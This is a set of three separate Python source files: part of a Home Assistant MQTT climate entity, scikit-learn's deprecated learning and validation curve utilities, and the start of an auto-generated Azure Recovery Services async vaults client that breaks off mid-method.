self._current_swing_mode = current_swing_mode
self._fan_list = fan_mode_list
self._operation_list = mode_list
self._swing_list = swing_mode_list
self._target_temperature_step = 1
self._send_if_off = send_if_off
self._payload_on = payload_on
self._payload_off = payload_off
def async_added_to_hass(self):
"""Handle being added to home assistant."""
@callback
def handle_current_temp_received(topic, payload, qos):
"""Handle current temperature coming via MQTT."""
try:
self._current_temperature = float(payload)
self.async_schedule_update_ha_state()
except ValueError:
_LOGGER.error("Could not parse temperature from %s", payload)
if self._topic[CONF_CURRENT_TEMPERATURE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_CURRENT_TEMPERATURE_TOPIC],
handle_current_temp_received, self._qos)
@callback
def handle_mode_received(topic, payload, qos):
"""Handle receiving mode via MQTT."""
if payload not in self._operation_list:
_LOGGER.error("Invalid mode: %s", payload)
else:
self._current_operation = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_MODE_STATE_TOPIC],
handle_mode_received, self._qos)
@callback
def handle_temperature_received(topic, payload, qos):
"""Handle target temperature coming via MQTT."""
try:
self._target_temperature = float(payload)
self.async_schedule_update_ha_state()
except ValueError:
_LOGGER.error("Could not parse temperature from %s", payload)
if self._topic[CONF_TEMPERATURE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_TEMPERATURE_STATE_TOPIC],
handle_temperature_received, self._qos)
@callback
def handle_fan_mode_received(topic, payload, qos):
"""Handle receiving fan mode via MQTT."""
if payload not in self._fan_list:
_LOGGER.error("Invalid fan mode: %s", payload)
else:
self._current_fan_mode = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_FAN_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_FAN_MODE_STATE_TOPIC],
handle_fan_mode_received, self._qos)
@callback
def handle_swing_mode_received(topic, payload, qos):
"""Handle receiving swing mode via MQTT."""
if payload not in self._swing_list:
_LOGGER.error("Invalid swing mode: %s", payload)
else:
self._current_swing_mode = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_SWING_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_SWING_MODE_STATE_TOPIC],
handle_swing_mode_received, self._qos)
@callback
def handle_away_mode_received(topic, payload, qos):
"""Handle receiving away mode via MQTT."""
if payload == self._payload_on:
self._away = True
elif payload == self._payload_off:
self._away = False
else:
_LOGGER.error("Invalid away mode: %s", payload)
self.async_schedule_update_ha_state()
if self._topic[CONF_AWAY_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_AWAY_MODE_STATE_TOPIC],
handle_away_mode_received, self._qos)
@callback
def handle_aux_mode_received(topic, payload, qos):
"""Handle receiving aux mode via MQTT."""
if payload == self._payload_on:
self._aux = True
elif payload == self._payload_off:
self._aux = False
else:
_LOGGER.error("Invalid aux mode: %s", payload)
self.async_schedule_update_ha_state()
if self._topic[CONF_AUX_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_AUX_STATE_TOPIC],
handle_aux_mode_received, self._qos)
@callback
def handle_hold_mode_received(topic, payload, qos):
"""Handle receiving hold mode via MQTT."""
self._hold = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_HOLD_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_HOLD_STATE_TOPIC],
handle_hold_mode_received, self._qos)
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def name(self):
"""Return the name of the climate device."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self._current_operation
@property
def operation_list(self):
"""Return the list of available operation modes."""
return self._operation_list
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return self._target_temperature_step
@property
def is_away_mode_on(self):
"""Return if away mode is on."""
return self._away
@property
def current_hold_mode(self):
"""Return hold mode setting."""
return self._hold
@property
def is_aux_heat_on(self):
"""Return true if away mode is on."""
return self._aux
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self._current_fan_mode
@property
def fan_list(self):
"""Return the list of available fan modes."""
return self._fan_list
@asyncio.coroutine
def async_set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_OPERATION_MODE) is not None:
operation_mode = kwargs.get(ATTR_OPERATION_MODE)
yield from self.async_set_operation_mode(operation_mode)
if kwargs.get(ATTR_TEMPERATURE) is not None:
if self._topic[CONF_TEMPERATURE_STATE_TOPIC] is None:
# optimistic mode
self._target_temperature = kwargs.get(ATTR_TEMPERATURE)
if self._send_if_off or self._current_operation != STATE_OFF:
mqtt.async_publish(
self.hass, self._topic[CONF_TEMPERATURE_COMMAND_TOPIC],
kwargs.get(ATTR_TEMPERATURE), self._qos, self._retain)
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_swing_mode(self, swing_mode):
"""Set new swing mode."""
if self._send_if_off or self._current_operation != STATE_OFF:
mqtt.async_publish(
self.hass, self._topic[CONF_SWING_MODE_COMMAND_TOPIC],
swing_mode, self._qos, self._retain)
if self._topic[CONF_SWING_MODE_STATE_TOPIC] is None:
self._current_swing_mode = swing_mode
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_fan_mode(self, fan):
"""Set new target temperature."""
if self._send_if_off or self._current_operation != STATE_OFF:
mqtt.async_publish(
self.hass, self._topic[CONF_FAN_MODE_COMMAND_TOPIC],
fan, self._qos, self._retain)
if self._topic[CONF_FAN_MODE_STATE_TOPIC] is None:
self._current_fan_mode = fan
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_operation_mode(self, operation_mode) -> None:
"""Set new operation mode."""
if self._topic[CONF_POWER_COMMAND_TOPIC] is not None:
if (self._current_operation == STATE_OFF and
operation_mode != STATE_OFF):
mqtt.async_publish(
self.hass, self._topic[CONF_POWER_COMMAND_TOPIC],
self._payload_on, self._qos, self._retain)
elif (self._current_operation != STATE_OFF and
operation_mode == STATE_OFF):
mqtt.async_publish(
self.hass, self._topic[CONF_POWER_COMMAND_TOPIC],
self._payload_off, self._qos, self._retain)
if self._topic[CONF_MODE_COMMAND_TOPIC] is not None:
mqtt.async_publish(
self.hass, self._topic[CONF_MODE_COMMAND_TOPIC],
operation_mode, self._qos, self._retain)
if self._topic[CONF_MODE_STATE_TOPIC] is None:
self._current_operation = operation_mode
self.async_schedule_update_ha_state()
@property
def current_swing_mode(self):
"""Return the swing setting."""
return self._current_swing_mode
@property
def swing_list(self):
"""List of available swing modes."""
return self._swing_list
@asyncio.coroutine
def async_turn_away_mode_on(self):
"""Turn away mode on."""
if self._topic[CONF_AWAY_MODE_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass,
self._topic[CONF_AWAY_MODE_COMMAND_TOPIC],
self._payload_on, self._qos, self._retain)
if self._topic[CONF_AWAY_MODE_STATE_TOPIC] is None:
self._away = True
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_away_mode_off(self):
"""Turn away mode off."""
if self._topic[CONF_AWAY_MODE_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass,
self._topic[CONF_AWAY_MODE_COMMAND_TOPIC],
self._payload_off, self._qos, self._retain)
if self._topic[CONF_AWAY_MODE_STATE_TOPIC] is None:
self._away = False
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_hold_mode(self, hold):
"""Update hold mode on."""
if self._topic[CONF_HOLD_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass,
self._topic[CONF_HOLD_COMMAND_TOPIC],
hold, self._qos, self._retain)
if self._topic[CONF_HOLD_STATE_TOPIC] is None:
self._hold = hold
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_aux_heat_on(self):
"""Turn auxillary heater on."""
if self._topic[CONF_AUX_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass, self._topic[CONF_AUX_COMMAND_TOPIC],
self._payload_on, self._qos, self._retain)
if self._topic[CONF_AUX_STATE_TOPIC] is None:
self._aux = True
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_aux_heat_off(self):
"""Turn auxillary heater off."""
if self._topic[CONF_AUX_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass, self._topic[CONF_AUX_COMMAND_TOPIC],
self._payload_off, self._qos, self._retain)
if self._topic[CONF_AUX_STATE_TOPIC] is None:
self._aux = False
self.async_schedule_update_ha_state()
@property
def supported_features(self):
"""Return the list of supported features."""
support = 0
if (self._topic[CONF_TEMPERATURE_STATE_TOPIC] is not None) or \
(self._topic[CONF_TEMPERATURE_COMMAND_TOPIC] is not None):
support |= SUPPORT_TARGET_TEMPERATURE
if (self._topic[CONF_MODE_COMMAND_TOPIC] is not None) or \
(self._topic[CONF_MODE_STATE_TOPIC] is not None):
support |= SUPPORT_OPERATION_MODE
if (self._topic[CONF_FAN_MODE_STATE_TOPIC] is not None) or \
(self._topic[CONF_FAN_MODE_COMMAND_TOPIC] is not None):
support |= SUPPORT_FAN_MODE
if (self._topic[CONF_SWING_MODE_STATE_TOPIC] is not None) or \
(self._topic[CONF_SWING_MODE_COMMAND_TOPIC] is not None):
support |= SUPPORT_SWING_MODE
if (self._topic[CONF_AWAY_MODE_STATE_TOPIC] is not None) or \
(self._topic[CONF_AWAY_MODE_COMMAND_TOPIC] is not None):
support |= SUPPORT_AWAY_MODE
if (self._topic[CONF_HOLD_STATE_TOPIC] is not None) or \
(self._topic[CONF_HOLD_COMMAND_TOPIC] is not None):
support |= SUPPORT_HOLD_MODE
if (self._topic[CONF_AUX_STATE_TOPIC] is not None) or \
(self._topic[CONF_AUX_COMMAND_TOPIC] is not None):
support |= SUPPORT_AUX_HEAT
return support
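# illustrative check of the bitmask built above (entity is a configured
# MqttClimate instance; results depend on which topics were configured):
#   bool(entity.supported_features & SUPPORT_TARGET_TEMPERATURE)
#   bool(entity.supported_features & SUPPORT_FAN_MODE)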
|
|
"""Utilities to evaluate models with respect to a variable
"""
# Author: Alexander Fabisch <afabisch@informatik.uni-bremen.de>
#
# License: BSD 3 clause
import warnings
import numpy as np
from .base import is_classifier, clone
from .cross_validation import check_cv
from .externals.joblib import Parallel, delayed
from .cross_validation import _safe_split, _score, _fit_and_score
from .metrics.scorer import check_scoring
from .utils import indexable
from .utils.fixes import astype
warnings.warn("This module was deprecated in version 0.18 in favor of the "
"model_selection module into which all the functions are moved."
" This module will be removed in 0.20",
DeprecationWarning)
__all__ = ['learning_curve', 'validation_curve']
def learning_curve(estimator, X, y, train_sizes=np.linspace(0.1, 1.0, 5),
cv=None, scoring=None, exploit_incremental_learning=False,
n_jobs=1, pre_dispatch="all", verbose=0,
error_score='raise'):
"""Learning curve.
Determines cross-validated training and test scores for different training
set sizes.
A cross-validation generator splits the whole dataset k times into training
and test data. Subsets of the training set with varying sizes will be used
to train the estimator and a score for each training subset size and the
test set will be computed. Afterwards, the scores will be averaged over
all k runs for each training subset size.
Read more in the :ref:`User Guide <learning_curves>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
train_sizes : array-like, shape (n_ticks,), dtype float or int
Relative or absolute numbers of training examples that will be used to
generate the learning curve. If the dtype is float, it is regarded as a
fraction of the maximum size of the training set (that is determined
by the selected validation method), i.e. it has to be within (0, 1].
Otherwise it is interpreted as absolute sizes of the training sets.
Note that for classification the number of samples usually has to
be big enough to contain at least one sample from each class.
(default: np.linspace(0.1, 1.0, 5))
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer to the :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
exploit_incremental_learning : boolean, optional, default: False
If the estimator supports incremental learning, this will be
used to speed up fitting for different training set sizes.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Returns
-------
train_sizes_abs : array, shape = (n_unique_ticks,), dtype int
Numbers of training examples that have been used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See :ref:`examples/model_selection/plot_learning_curve.py
<sphx_glr_auto_examples_model_selection_plot_learning_curve.py>`
"""
if exploit_incremental_learning and not hasattr(estimator, "partial_fit"):
raise ValueError("An estimator must support the partial_fit interface "
"to exploit incremental learning")
X, y = indexable(X, y)
# Make a list since we will be iterating multiple times over the folds
cv = list(check_cv(cv, X, y, classifier=is_classifier(estimator)))
scorer = check_scoring(estimator, scoring=scoring)
# HACK as long as boolean indices are allowed in cv generators
if cv[0][0].dtype == bool:
new_cv = []
for i in range(len(cv)):
new_cv.append((np.nonzero(cv[i][0])[0], np.nonzero(cv[i][1])[0]))
cv = new_cv
n_max_training_samples = len(cv[0][0])
# Because the lengths of folds can be significantly different, it is
# not guaranteed that we use all of the available training data when we
# use the first 'n_max_training_samples' samples.
train_sizes_abs = _translate_train_sizes(train_sizes,
n_max_training_samples)
n_unique_ticks = train_sizes_abs.shape[0]
if verbose > 0:
print("[learning_curve] Training set sizes: " + str(train_sizes_abs))
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
if exploit_incremental_learning:
classes = np.unique(y) if is_classifier(estimator) else None
out = parallel(delayed(_incremental_fit_estimator)(
clone(estimator), X, y, classes, train, test, train_sizes_abs,
scorer, verbose) for train, test in cv)
else:
out = parallel(delayed(_fit_and_score)(
clone(estimator), X, y, scorer, train[:n_train_samples], test,
verbose, parameters=None, fit_params=None, return_train_score=True,
error_score=error_score)
for train, test in cv for n_train_samples in train_sizes_abs)
out = np.array(out)[:, :2]
n_cv_folds = out.shape[0] // n_unique_ticks
out = out.reshape(n_cv_folds, n_unique_ticks, 2)
out = np.asarray(out).transpose((2, 1, 0))
return train_sizes_abs, out[0], out[1]
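# illustrative usage of learning_curve (X, y are placeholders for a
# dataset; any estimator with fit/predict works):
#
#   from sklearn.naive_bayes import GaussianNB
#   sizes, train_scores, test_scores = learning_curve(
#       GaussianNB(), X, y, train_sizes=np.linspace(0.1, 1.0, 5), cv=5)
#   # both score arrays have shape (n_ticks, n_cv_folds) and are usually
#   # averaged over axis 1 before plotting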
def _translate_train_sizes(train_sizes, n_max_training_samples):
"""Determine absolute sizes of training subsets and validate 'train_sizes'.
Examples:
_translate_train_sizes([0.5, 1.0], 10) -> [5, 10]
_translate_train_sizes([5, 10], 10) -> [5, 10]
Parameters
----------
train_sizes : array-like, shape (n_ticks,), dtype float or int
Numbers of training examples that will be used to generate the
learning curve. If the dtype is float, it is regarded as a
fraction of 'n_max_training_samples', i.e. it has to be within (0, 1].
n_max_training_samples : int
Maximum number of training samples (upper bound of 'train_sizes').
Returns
-------
train_sizes_abs : array, shape (n_unique_ticks,), dtype int
Numbers of training examples that will be used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
"""
train_sizes_abs = np.asarray(train_sizes)
n_ticks = train_sizes_abs.shape[0]
n_min_required_samples = np.min(train_sizes_abs)
n_max_required_samples = np.max(train_sizes_abs)
if np.issubdtype(train_sizes_abs.dtype, np.float):
if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0:
raise ValueError("train_sizes has been interpreted as fractions "
"of the maximum number of training samples and "
"must be within (0, 1], but is within [%f, %f]."
% (n_min_required_samples,
n_max_required_samples))
train_sizes_abs = astype(train_sizes_abs * n_max_training_samples,
dtype=np.int, copy=False)
train_sizes_abs = np.clip(train_sizes_abs, 1,
n_max_training_samples)
else:
if (n_min_required_samples <= 0 or
n_max_required_samples > n_max_training_samples):
raise ValueError("train_sizes has been interpreted as absolute "
"numbers of training samples and must be within "
"(0, %d], but is within [%d, %d]."
% (n_max_training_samples,
n_min_required_samples,
n_max_required_samples))
train_sizes_abs = np.unique(train_sizes_abs)
if n_ticks > train_sizes_abs.shape[0]:
warnings.warn("Removed duplicate entries from 'train_sizes'. Number "
"of ticks will be less than the size of "
"'train_sizes' %d instead of %d)."
% (train_sizes_abs.shape[0], n_ticks), RuntimeWarning)
return train_sizes_abs
def _incremental_fit_estimator(estimator, X, y, classes, train, test,
train_sizes, scorer, verbose):
"""Train estimator on training subsets incrementally and compute scores."""
train_scores, test_scores = [], []
partitions = zip(train_sizes, np.split(train, train_sizes)[:-1])
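# e.g. with train_sizes = [2, 4] and len(train) == 6, np.split yields
# [train[:2], train[2:4], train[4:]]; dropping the last chunk pairs each
# size with only the *new* samples that partial_fit() still has to see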
for n_train_samples, partial_train in partitions:
train_subset = train[:n_train_samples]
X_train, y_train = _safe_split(estimator, X, y, train_subset)
X_partial_train, y_partial_train = _safe_split(estimator, X, y,
partial_train)
X_test, y_test = _safe_split(estimator, X, y, test, train_subset)
if y_partial_train is None:
estimator.partial_fit(X_partial_train, classes=classes)
else:
estimator.partial_fit(X_partial_train, y_partial_train,
classes=classes)
train_scores.append(_score(estimator, X_train, y_train, scorer))
test_scores.append(_score(estimator, X_test, y_test, scorer))
return np.array((train_scores, test_scores)).T
def validation_curve(estimator, X, y, param_name, param_range, cv=None,
scoring=None, n_jobs=1, pre_dispatch="all", verbose=0):
"""Validation curve.
Determine training and test scores for varying parameter values.
Compute scores for an estimator with different values of a specified
parameter. This is similar to grid search with one parameter. However, this
will also compute training scores and is merely a utility for plotting the
results.
Read more in the :ref:`User Guide <validation_curve>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
param_name : string
Name of the parameter that will be varied.
param_range : array-like, shape (n_values,)
The values of the parameter that will be evaluated.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer to the :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
Returns
-------
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See
:ref:`examples/model_selection/plot_validation_curve.py
<sphx_glr_auto_examples_model_selection_plot_validation_curve.py>`
"""
X, y = indexable(X, y)
cv = check_cv(cv, X, y, classifier=is_classifier(estimator))
scorer = check_scoring(estimator, scoring=scoring)
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
out = parallel(delayed(_fit_and_score)(
estimator, X, y, scorer, train, test, verbose,
parameters={param_name: v}, fit_params=None, return_train_score=True)
for train, test in cv for v in param_range)
out = np.asarray(out)[:, :2]
n_params = len(param_range)
n_cv_folds = out.shape[0] // n_params
out = out.reshape(n_cv_folds, n_params, 2).transpose((2, 1, 0))
return out[0], out[1]
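# illustrative usage of validation_curve (X, y are placeholders for a
# dataset):
#
#   from sklearn.svm import SVC
#   train_scores, test_scores = validation_curve(
#       SVC(), X, y, param_name="gamma",
#       param_range=np.logspace(-6, -1, 5), cv=5)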
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VaultsOperations:
"""VaultsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.recoveryservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_subscription_id(
self,
**kwargs: Any
) -> AsyncIterable["_models.VaultList"]:
"""Fetches all the resources of the specified type in the subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either VaultList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservices.models.VaultList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VaultList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription_id.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VaultList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription_id.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.RecoveryServices/vaults'} # type: ignore
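# illustrative usage (assumes an authenticated management client that
# exposes this operation group as `client.vaults`):
#
#   async for vault in client.vaults.list_by_subscription_id():
#       print(vault.name)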
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.VaultList"]:
"""Retrieve a list of Vaults.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either VaultList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservices.models.VaultList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VaultList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VaultList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults'} # type: ignore
async def get(
self,
resource_group_name: str,
vault_name: str,
**kwargs: Any
) -> "_models.Vault":
"""Get the Vault details.
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Vault, or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservices.models.Vault
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Vault', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
vault_name: str,
vault: "_models.Vault",
**kwargs: Any
) -> "_models.Vault":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Vault"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
